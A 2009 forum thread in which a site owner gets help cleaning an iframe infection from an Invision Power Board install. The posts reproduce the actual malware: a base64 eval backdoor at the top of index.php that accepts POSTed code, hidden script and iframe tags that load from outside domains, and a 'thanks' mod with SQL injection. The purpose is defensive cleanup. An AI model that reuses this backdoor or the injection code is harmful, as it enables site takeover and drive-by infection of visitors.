iframe Virus Attack

Rohit · Oct 16, 2009

Guys,

My forum is got fucked up with iframe virus attack. The iframe code is all over my host files. I have Ipb 2.3.6
Is there anybody who can help me. I'm pulling my hair right now.
Unfortunately i don't even have backup.:'(

Hyperz · Oct 16, 2009

Sure, it's in all index.html/php files at the end. You'll have to remove it in all of them (there's quite a lot). I suggest using the Replace function of Notepad++.

Edit: also check the .htaccess files.

Rohit · Oct 16, 2009

Thanks Hyperz....but can u explain a little more....should i simply delete iframe line t or replace it with something if yes...then replace with what. Isn't there any script which can do all this job for me...?

Hyperz · Oct 16, 2009

Post the content of index.php so I can see. Also (this is important) you'll have to change the passwords of your FTP, cPanel or DirectAdmin account and - if you have a VPS/Dedi - the root password AFTER you did a complete virus scan on your PC because that's how your site got infected. Not doing so will result in the iframe exploit returning.

Rohit · Oct 16, 2009

in all index.html files it's like this:

<html>
<head><title>Invision Power Board - Bulletin Board System</title></head>
<script src=http://nwdrealty.com/Scripts/Untitled-17.php ></script><body><div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div>
<h1>403: Invision Power Board -> Forbidden</h1>
<hr>
You have reached this Page in error, please use
your back button to return to Invision Board.
<hr>
<a href="http://anonym.to/http://www.invisionboard.com/">Invision Power Board</a>
</body>
</html>

in main index.php file its like this:

<?php eval(base64_decode('aWYoIWlzc2V0KCR1NGsxKSl7ZnVuY3Rpb24gdTRrKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjUzWkhKbFlXeDBlUzVqYjIwdlUyTnlhWEIwY3k5VmJuUnBkR3hsWkMweE55NXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdTRrMigkYSwkYiwkYywkZCl7Z2xvYmFsICR1NGsxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR1NGsxKSljYWxsX3VzZXJfZnVuYygkdTRrMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1NGsnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgndTRrJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHU0a2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3U0azInKSkhPSd1NGsyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
#apd_set_pprof_trace();

/*
+--------------------------------------------------------------------------
| Invision Power Board
| ========================================
| by Matthew Mecham
| (c) 2001 - 2005 Invision Power Services
| http://www.invisionpower.com
| ========================================
| Web: http://www.invisionboard.com
| Email: matt@invisionpower.com
+---------------------------------------------------------------------------
| INVISION POWER BOARD IS NOT FREE SOFTWARE!
| http://www.invisionboard.com/?license
+---------------------------------------------------------------------------
| > $Date: 2008-10-02 11:12:17 -0400 (Thu, 02 Oct 2008) $
| > $Revision: 2569 $
| > $Author: matt $
+---------------------------------------------------------------------------
|
| > Wrapper script
| > Script written by Matt Mecham
| > Date started: 14th February 2002
| > Date updated: IPB 2.1.0: Tue 12 July 2005
|
+--------------------------------------------------------------------------
*/

/**
* Main executable wrapper.
*
* Set-up and load module to run
*
* @package InvisionPowerBoard
* @author Matt Mecham
* @version 2.1
*/

/**
* Script type
*
*/
define( 'IPB_THIS_SCRIPT', 'public' );
define( 'IPB_LOAD_SQL' , 'queries' );

require_once( './init.php' );

//===========================================================================
// MAIN PROGRAM
//===========================================================================

$INFO = array();

//--------------------------------
// Load our classes
//--------------------------------

require_once ROOT_PATH . "sources/ipsclass.php";
require_once ROOT_PATH . "sources/classes/class_display.php";
require_once ROOT_PATH . "sources/classes/class_session.php";
require_once ROOT_PATH . "sources/classes/class_forums.php";
require_once ROOT_PATH . "sources/classes/class_hide.php";
require_once KERNEL_PATH . "class_converge.php";

if ( file_exists( ROOT_PATH . "conf_global.php" ) )
{
require_once ROOT_PATH . "conf_global.php";
}

# Are we installed?
if( ! $INFO['sql_user'] )
{
$host = $_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : @getenv('HTTP_HOST');
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : @getenv('PHP_SELF');
@header("Location: http://".$host.rtrim(dirname($self), '/\\')."/install/index.php" );
}

# Initiate super-class
$ipsclass = new ipsclass();
$ipsclass->vars = $INFO;

//--------------------------------
// The clocks a' tickin'
//--------------------------------

$Debug = new Debug;
$Debug->startTimer();

//--------------------------------
// Load the DB driver and such
//--------------------------------

$ipsclass->init_db_connection();

//--------------------------------
// Set debug mode
//--------------------------------

$ipsclass->DB->set_debug_mode( ( IPS_SQL_DEBUG_MODE ) ? ( isset($_GET['debug']) ? intval($_GET['debug']) : 0 ) : 0 );

//--------------------------------
// INIT other classes
//--------------------------------

$ipsclass->print = new display();
$ipsclass->print->ipsclass =& $ipsclass;

$ipsclass->sess = new session();
$ipsclass->sess->ipsclass =& $ipsclass;

$ipsclass->forums = new forum_functions();
$ipsclass->forums->ipsclass =& $ipsclass;

$ipsclass->hide = new hide();
$ipsclass->hide->ipsclass =& $ipsclass;

//--------------------------------
// Set up our vars
//--------------------------------

$ipsclass->parse_incoming();
//--------------------------------
// Inferno Shoutbox: Don't Update Sessions
//--------------------------------

if ($ipsclass->input['autocom'] == 'infernoshout' || $ipsclass->input['module'] == 'infernoshout')
{
$ipsclass->sess->do_update = false;
}

//--------------------------------
// Set converge
//--------------------------------

$ipsclass->converge = new class_converge( $ipsclass->DB );

//===========================================================================
// Generate choice array
//===========================================================================

$choice = array(
"idx" => array( "boards" , 'boards' , array('chatting','birthdays', 'calendar') ),
"sc" => array( "boards" , 'boards' , array('chatting','birthdays', 'calendar') ),
"sf" => array( "forums" , 'forums' , array('announcements', 'multimod') ),
"sr" => array( "forums" , 'forums' , array() ),
"st" => array( "topics" , 'topics' , array('badwords','emoticons','attachtypes','bbcode', 'multimod','ranks','profilefields' ) ),
"announce" => array( "announcements" , 'announcements', array('ranks' ) ),
"login" => array( "login" , 'login' , array() ),
"post" => array( "post" , 'post' , array('attachtypes','badwords','bbcode','emoticons','ranks' ) ),
"reg" => array( "register" , 'register' , array('profilefields') ),
"thanks" => array( "thanks" , 'thanks' , array() ),
"online" => array( "online" , 'online' , array() ),
"members" => array( "memberlist" , 'memberlist' , array('ranks','profilefields' ) ),
"help" => array( "help" , 'help' , array() ),
"search" => array( "search" , 'search' , array('badwords','attachtypes','multimod','ranks' ) ),
"mod" => array( "moderate" , 'moderate' , array('attachtypes','multimod','bbcode','emoticons','badwords' ) ),
"print" => array( "misc/print_page" , 'printpage' , array('attachtypes','multimod','ranks' ) ),
"forward" => array( "misc/forward_page" , 'forwardpage' , array() ),
"mail" => array( "misc/contact_member", 'contactmember', array() ),
"report" => array( "misc/contact_member", 'contactmember', array() ),
"chat" => array( "misc/contact_member", 'contactmember', array() ),
'boardrules' => array( "misc/contact_member", 'contactmember', array() ),
"msg" => array( "messenger" , 'messenger' , array('ranks','profilefields','attachtypes','badwords','bbcode','emoticons' ) ),
"usercp" => array( "usercp" , 'usercp' , array( 'attachtypes', 'badwords', 'bbcode', 'emoticons', 'profilefields' ) ),
"profile" => array( "profile" , 'profile' , array('ranks','profilefields','badwords','bbcode','emoticons' ) ),
"track" => array( "misc/tracker" , 'tracker' , array() ),
"stats" => array( "misc/stats" , 'stats' , array() ),
"attach" => array( "attach" , 'attach' , array('attachtypes' ) ),
'legends' => array( 'misc/legends' , 'legends' , array('badwords','bbcode','emoticons' ) ),
'calendar' => array( "calendar" , 'calendar' , array('attachtypes','bbcode', 'ranks', 'multimod', 'emoticons', 'badwords', 'calendars', 'profilefields' ) ),
'buddy' => array( "browsebuddy" , 'assistant' , array() ),
'mmod' => array( "misc/multi_moderate", 'mmod' , array('multimod' ) ),
'warn' => array( "misc/warn" , 'warn' , array('badwords','bbcode' ,'emoticons' ) ),
'home' => array( 'portal' , 'portal' , array('portal','attachtypes','multimod','ranks','profilefields' ) ),
'module' => array( 'modules' , 'modules' , array() ),
'task' => array( 'taskloader' , 'taskloader' , array() ),
'findpost' => array( 'findpost' , 'findpost' , array() ),
"xmlout" => array( "xmlout" , 'xmlout' , array('attachtypes','multimod','bbcode','ranks','profilefields','emoticons','badwords' ) ),
'paysubs' => array( 'paysubscriptions' , 'paysubscriptions' , array() ),
'rssout' => array( 'rssout' , 'rssout' , array() ),
'captcha' => array( 'captcha' , 'captcha' , array() ),
'component' => array( 'component' , 'component' , array() ),
);

//===========================================================================
// Short tags...
//===========================================================================

$ipsclass->input['act'] = isset($ipsclass->input['act']) ? $ipsclass->input['act'] : ( IPB_MAKE_PORTAL_HOMEPAGE ? 'home' : 'idx' );

if( is_array($ipsclass->input['act']) )
{
$ipsclass->input['act'] = ( IPB_MAKE_PORTAL_HOMEPAGE ) ? 'home' : 'idx';
}

//---------------------------------------------------
// Check to make sure the array key exits..
//---------------------------------------------------

if ( ! isset($choice[ strtolower($ipsclass->input['act']) ][0]) )
{
$ipsclass->input['act'] = ( IPB_MAKE_PORTAL_HOMEPAGE ) ? 'home' : 'idx';
}

$ipsclass->input['_low_act'] = strtolower( $ipsclass->input['act'] );

if ( isset($ipsclass->input['showforum']) && $ipsclass->input['showforum'] != "" )
{
$ipsclass->input['act'] = "sf";
$ipsclass->input['f'] = intval($ipsclass->input['showforum']);
}
else if ( isset($ipsclass->input['showtopic']) && $ipsclass->input['showtopic'] != "")
{
$ipsclass->input['act'] = "st";
$ipsclass->input['t'] = intval($ipsclass->input['showtopic']);

//---------------------------------------------------
// Grab and cache the topic now as we need the 'f' attr for
// the skins...
//---------------------------------------------------

$ipsclass->DB->simple_construct( array( 'select' => '*',
'from' => 'topics',
'where' => "tid=".$ipsclass->input['t'],
) );

$ipsclass->DB->simple_exec();

$ipsclass->topic_cache = $ipsclass->DB->fetch_row();
$ipsclass->input['f'] = $ipsclass->topic_cache['forum_id'];
}
else if ( isset($ipsclass->input['showuser']) && $ipsclass->input['showuser'] != "")
{
$ipsclass->input['act'] = "profile";
$ipsclass->input['MID'] = intval($ipsclass->input['showuser']);
}
else if ( isset($ipsclass->input['automodule']) && $ipsclass->input['automodule'] != "" )
{
$ipsclass->input['act'] = 'module';
$ipsclass->input['module'] = $ipsclass->input['automodule'];
}
else if ( isset($ipsclass->input['autocom']) && $ipsclass->input['autocom'] != "" )
{
$ipsclass->input['act'] = 'component';
$ipsclass->input['module'] = $ipsclass->input['autocom'];
}
else
{
$ipsclass->input['act'] = ( ! isset($ipsclass->input['act']) || $ipsclass->input['act'] == '' ) ? "idx" : $ipsclass->input['act'];
}

if ( !isset($ipsclass->input['_low_act']) OR !$ipsclass->input['_low_act'] OR $ipsclass->input['_low_act'] == 'idx' OR $ipsclass->input['_low_act'] == 'home' )
{
$ipsclass->input['_low_act'] = strtolower($ipsclass->input['act']);
}

//--------------------------------
// Start off the cache array
//--------------------------------

$ipsclass->cache_array = array_merge( $choice[ $ipsclass->input['_low_act'] ][2], array('skin_remap', 'rss_calendar', 'rss_export', 'components', 'banfilters', 'settings', 'group_cache', 'systemvars', 'skin_id_cache', 'forum_cache', 'moderators', 'stats', 'languages', 'grouporder_cache') );

//--------------------------------
// Module? Load INIT class
//--------------------------------

if ( ( $ipsclass->input['act'] == 'module' OR $ipsclass->input['act'] == 'component' ) and $ipsclass->input['module'] )
{
$file = ROOT_PATH.'sources/components_init/'. $ipsclass->txt_alphanumerical_clean( $ipsclass->input['module'] ).'.php';

if ( file_exists( $file ) )
{
require_once( $file );
$init_class = new component_init();
$init_class->ipsclass =& $ipsclass;
$init_class->run_init();
}
}

//===========================================================================
// Get cache...
//===========================================================================

$ipsclass->init_cache_setup();
$ipsclass->init_load_cache( $ipsclass->cache_array );

//--------------------------------
// Initialize the FUNC
//--------------------------------

$ipsclass->initiate_ipsclass();

//--------------------------------
// The rest :D
//--------------------------------

$ipsclass->member = $ipsclass->sess->authorise();
$ipsclass->lastclick = $ipsclass->sess->last_click;
$ipsclass->location = $ipsclass->sess->location;
$ipsclass->session_id = $ipsclass->sess->session_id; // Used in URLs
$ipsclass->my_session = $ipsclass->sess->session_id; // Used in code

//-----------------------------------------
// Cache md5 check
//-----------------------------------------

$ipsclass->md5_check = $ipsclass->return_md5_check();

//--------------------------------
// Initialize the forums
//--------------------------------

$ipsclass->forums->strip_invisible = 1;
$ipsclass->forums->forums_init();

//--------------------------------
// Load the skin
//--------------------------------

$ipsclass->load_skin();

$ppu = 0;
$tpu = 0;

if( isset($ipsclass->member['view_prefs']) )
{
list($ppu,$tpu) = explode( "&", $ipsclass->member['view_prefs'] );
}

$ipsclass->vars['display_max_topics'] = ($tpu > 0) ? $tpu : $ipsclass->vars['display_max_topics'];
$ipsclass->vars['display_max_posts'] = ($ppu > 0) ? $ppu : $ipsclass->vars['display_max_posts'];

//===========================================================================
// Set up the session ID stuff
//===========================================================================

if ( $ipsclass->session_type == 'cookie' )
{
$ipsclass->session_id = "";
$ipsclass->base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?';
}
else
{
$ipsclass->base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?s='.$ipsclass->session_id.'&';
}

$ipsclass->js_base_url = $ipsclass->vars['board_url'].'/index.'.$ipsclass->vars['php_ext'].'?s='.$ipsclass->session_id.'&';

//--------------------------------
// Set up the forum_read cookie
//--------------------------------

$ipsclass->hdl_forum_read_cookie();

//===========================================================================
// Set up defaults
//===========================================================================

$ipsclass->skin_id = $ipsclass->skin['_setid'];

$ipsclass->vars['img_url'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_images/' . $ipsclass->skin['_imagedir'] : 'style_images/' . $ipsclass->skin['_imagedir'];
$ipsclass->vars['AVATARS_URL'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_avatars' : 'style_avatars';
$ipsclass->vars['EMOTICONS_URL'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_emoticons/<#EMO_DIR#>' : 'style_emoticons/<#EMO_DIR#>';
$ipsclass->vars['mime_img'] = $ipsclass->vars['ipb_img_url'] ? $ipsclass->vars['ipb_img_url'] . 'style_images/<#IMG_DIR#>' : 'style_images/<#IMG_DIR#>';

//--------------------------------
// Set up our language choice
//--------------------------------

if ( !isset($ipsclass->vars['default_language']) OR $ipsclass->vars['default_language'] == "")
{
$ipsclass->vars['default_language'] = 'en';
}

//--------------------------------
// Did we choose a language?
//--------------------------------

if ( (isset($ipsclass->input['setlanguage']) AND $ipsclass->input['setlanguage']) AND (isset($ipsclass->input['langid']) AND $ipsclass->input['langid']) AND $ipsclass->member['id'] )
{
if ( is_array( $ipsclass->cache['languages'] ) and count( $ipsclass->cache['languages'] ) )
{
foreach( $ipsclass->cache['languages'] as $data )
{
if ( $data['ldir'] == $ipsclass->input['langid'] )
{
$ipsclass->DB->do_update( 'members', array( 'language' => $data['ldir'] ), 'id='.$ipsclass->member['id'] );
$ipsclass->member['language'] = $data['ldir'];
}
}
}
}

$ipsclass->load_language('lang_global');

//--------------------------------
// Legacy mode?
//--------------------------------

if ( LEGACY_MODE )
{
$DB =& $ipsclass->DB;
$std =& $ipsclass;
$ibforums =& $ipsclass;
$forums =& $ipsclass->forums;
$print =& $ipsclass->print;
$sess =& $ipsclass->sess;

$ipsclass->load_template('skin_global');
$ipsclass->skin_global = $ipsclass->compiled_templates['skin_global'];
}

//===========================================================================
// DECONSTRUCTOR
//===========================================================================

if ( USE_SHUTDOWN and $ipsclass->input['act'] != 'task' )
{
@chdir( ROOT_PATH );
$ROOT_PATH = getcwd();

register_shutdown_function( array( &$ipsclass, 'my_deconstructor') );
}
require_once (ROOT_PATH . '/infernoshout/engine/inferno_engine.php');
$ipsclass->infernoshout = new infernoshout_engine();
$ipsclass->infernoshout->load_shoutbox();

//===========================================================================
// Force log in / board offline?
//===========================================================================

if ($ipsclass->input['_low_act'] != 'login' and
$ipsclass->input['_low_act'] != 'reg' and
$ipsclass->input['_low_act'] != 'xmlout' and
$ipsclass->input['_low_act'] != 'rssout' and
$ipsclass->input['_low_act'] != 'attach' and
$ipsclass->input['_low_act'] != 'task' and
$ipsclass->input['_low_act'] != 'paysubs' )
{
//-----------------------------------------
// Do we have a display name?
//-----------------------------------------

if ( ! $ipsclass->member['members_display_name'] AND $ipsclass->member['members_created_remote'] )
{
$pmember = $ipsclass->DB->build_and_exec_query( array( 'select' => '*', 'from' => 'members_partial', 'where' => "partial_member_id=" . $ipsclass->member['id'] ) );

if ( $pmember['partial_member_id'] )
{
$ipsclass->boink_it( $ipsclass->base_url . 'act=reg&CODE=complete_login&mid='.$ipsclass->member['id'].'&key='.$pmember['partial_date'] );
}
}

//--------------------------------
// Do we have permission to view
// the board?
//--------------------------------

if ( $ipsclass->member['g_view_board'] != 1 )
{
$ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_view_board') );
}

//--------------------------------
// Is the board offline?
//--------------------------------

if ($ipsclass->vars['board_offline'] == 1)
{
if ($ipsclass->member['g_access_offline'] != 1)
{
$ipsclass->vars['no_reg'] = 1;
$ipsclass->board_offline();
}
}

//--------------------------------
// Is log in enforced?
//--------------------------------

if ( (! $ipsclass->member['id']) and ($ipsclass->vars['force_login'] == 1) )
{
require ROOT_PATH."sources/action_public/login.php";
$runme = new login();
$runme->ipsclass =& $ipsclass;
$runme->auto_run();

}

//--------------------------------
// Show PURCHASE screen?
// Not enforced
//--------------------------------

if ( !isset($ipsclass->member['sub_end']) OR !$ipsclass->member['sub_end'] )
{
//--------------------------------
// 1: No enforce, chosen from reg
//--------------------------------

if ( ! $ipsclass->vars['subsm_enforce'] and (isset($ipsclass->member['subs_pkg_chosen']) AND $ipsclass->member['subs_pkg_chosen']) )
{
$ipsclass->input['act'] = 'paysubs';
$ipsclass->input['CODE'] = 'paymentmethod';
$ipsclass->input['sub'] = $ipsclass->member['subs_pkg_chosen'];
$ipsclass->input['nocp'] = 1;
$ipsclass->input['msgtype'] = 'fromreg';
}

//--------------------------------
// Show PURCHASE screen?
// Enforced
//--------------------------------

if ( $ipsclass->vars['subsm_enforce'] and $ipsclass->member['mgroup'] == $ipsclass->vars['subsm_nopkg_group'] )
{
$ipsclass->input['act'] = 'paysubs';
$ipsclass->input['nocp'] = 1;
$ipsclass->input['msgtype'] = 'force';

if ( $ipsclass->member['subs_pkg_chosen'] )
{
$ipsclass->input['CODE'] = 'paymentmethod';
$ipsclass->input['sub'] = $ipsclass->member['subs_pkg_chosen'];
}
}
}
}

//===========================================================================
// REQUIRE AND RUN
//===========================================================================
// Thanks Light - Adapted By ThiagoInfo - Start
if($ipsclass->input['act'] == "thanks")
{
$output = "";
$thpid = $ipsclass->input['pid'];
$divid = "thank_".$ipsclass->input['pid'];
$userpost = $ipsclass->input['usp'];
$userpostid = $ipsclass->input['tid'];
if (!$thpid || !$ipsclass->member['id'])
{
return;
}
$userid = $ipsclass->member['id'];
$username = $ipsclass->member['members_display_name'];

$ipsclass->DB->query("INSERT INTO ibf_post_thanks (userid, username, postid) VALUES('$userid', '$username', '$thpid')");
$query = $ipsclass->DB->query("SELECT thanks_point FROM ibf_members WHERE id = '$userpostid'");
$row = $ipsclass->DB->fetch_row($query);
$thanks_point = $row['thanks_point'];
++$thanks_point;
$ipsclass->DB->query("UPDATE ibf_members SET thanks_point ='$thanks_point' where id = '$userpostid'");
$query = $ipsclass->DB->query("SELECT * FROM ibf_post_thanks WHERE postid = '$thpid' ORDER BY username ASC");
$thank_tot = $ipsclass->DB->get_num_rows($query);
if ($thank_tot)
{
$thank_text1 = "<div class=\"row1\" colspan=\"2\" align=\"top\"><strong>The Following {$thank_tot} Users Say Thank You to {$userpost} For This Useful Post:</strong></div>";
while($row = $ipsclass->DB->fetch_row($query))
{
$thank_text .= "<a href=\"index.php?showuser=".$row['userid']."\">".$row['username']."</a>, ";
}
$thank_text = preg_replace( "/,\s+$/", "" , $thank_text);
$output = "{$thank_text1} {$thank_text}";
$output = str_replace("|", "", $output);
}
echo "$divid|$output";
exit;
}
// Thanks Light - Adapted By ThiagoInfo - End

if ( $ipsclass->input['act'] == 'home' AND $ipsclass->vars['csite_on'] )
{
require ROOT_PATH."sources/action_public/portal.php";
$csite = new portal();
$csite->ipsclass =& $ipsclass;
$csite->auto_run();
}
else if ( $ipsclass->input['act'] == 'module' AND USE_MODULES )
{
require ROOT_PATH."modules/module_loader.php";
$loader = new module_loader();
$loader->ipsclass =& $ipsclass;
$loader->run_loader();
}
else if ( $ipsclass->input['act'] == 'component' )
{
$file = ROOT_PATH.'sources/components_public/'. $ipsclass->txt_alphanumerical_clean( $ipsclass->input['module'] ).'.php';

if ( file_exists( $file ) )
{
require_once( $file );
$loader = new component_public();
$loader->ipsclass =& $ipsclass;
$loader->run_component();
}
else
{
@header( "Location: ".$ipsclass->base_url );
}
}
else
{
// Require and run
$_pre_load = $ipsclass->memory_debug_make_flag();
require( ROOT_PATH."sources/action_public/".$choice[ strtolower($ipsclass->input['act']) ][0].".php" );
$runme = new $choice[ strtolower($ipsclass->input['act']) ][1];
$runme->ipsclass =& $ipsclass;
$ipsclass->memory_debug_add( "CORE: Loaded ".$choice[ strtolower($ipsclass->input['act']) ][0].".php", $_pre_load );
$runme->auto_run();
}

?>

<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div>

Sl!M · Oct 16, 2009

disable html in your forum also.. lol

Hyperz · Oct 16, 2009

For index.php remove these:

Code:

<?php eval(base64_decode('aWYoIWlzc2V0KCR1NGsxKSl7ZnVuY3 Rpb24gdTRrKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3Jp cHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYX MgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9 cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi 88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChc W10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaC gnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJv bUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW 50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9 aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3 JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKH ByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJH YpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMjUzWkhKbFlXeDBlUzVqYjIwdlUy TnlhWEIwY3k5VmJuUnBkR3hsWkMweE55NXdhSEFnUGp3dmMyTn lhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9k eScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLC RhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMu PSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdTRrMigkYSwkYiwkYy wkZCl7Z2xvYmFsICR1NGsxOyRzPWFycmF5KCk7aWYoZnVuY3Rp b25fZXhpc3RzKCR1NGsxKSljYWxsX3VzZXJfZnVuYygkdTRrMS wkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygx KSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1NGsnKXJldH VybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vs c2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbm RsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+ PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO2 9iX2VuZF9jbGVhbigpO31vYl9zdGFydCgndTRrJyk7Zm9yKCRp PTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXV swXSk7ZWNobyAkc1skaV1bMV07fX19JHU0a2w9KCgkYT1Ac2V0 X2Vycm9yX2hhbmRsZXIoJ3U0azInKSkhPSd1NGsyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKT s=')); ?>

and

Code:

<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"></div>
<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div>

For ALL index.html files remove:

Code:

<script src=http://nwdrealty.com/Scripts/Untitled-17.php ></script>

and

Code:

<div style="display:none"><iframe width=193 height=228 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div>

Hyperz · Oct 16, 2009

Sl!M said:
